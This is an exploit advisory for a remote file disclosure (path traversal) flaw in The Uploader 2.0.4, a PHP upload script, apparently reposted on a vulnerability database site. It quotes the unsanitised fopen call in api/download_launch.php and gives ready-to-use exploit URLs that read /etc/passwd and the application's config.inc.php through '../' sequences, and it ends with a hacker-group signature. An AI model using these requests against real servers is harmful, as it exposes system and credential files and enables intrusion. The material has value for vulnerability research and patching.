================================================= The Uploader 2.0.4 Remote File disclosure Vulnerability ================================================= ============================================== # Script Name : The Uploader # Version : [2.0.4] # Language : php # Author : Xa7m3d (H4K@hotmail.ch) # Download : http://sourceforge.net/projects/theuploader # Tested on : ubuntu 9.10 ============================================== File Disclosure : in : api/download_launch.php ####################################### $open=fopen($main['upload_directory'] . $_GET['filename'], "r"); <??(+) $size=filesize($main['upload_directory'] . $_GET['filename']); $read=fread($open, $size); header("Content-Type: application/octet-stream"); header("Content-Length: " . $size); header("Content-Transfer-Encoding: binary"); header("Content-Disposition: attachment; filename=" . $_GET['filename']); <??(+) ####################################### 3XP : api/download_launch.php?filename=../../../../../etc/passwd Example : http://server/theuploader/api/download_launch.php?filename=../config.inc.php T3AM Piracy Unlimited Tunisia : # Cyb3R H3LL # k[i]ng # La Haft Xroy #
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论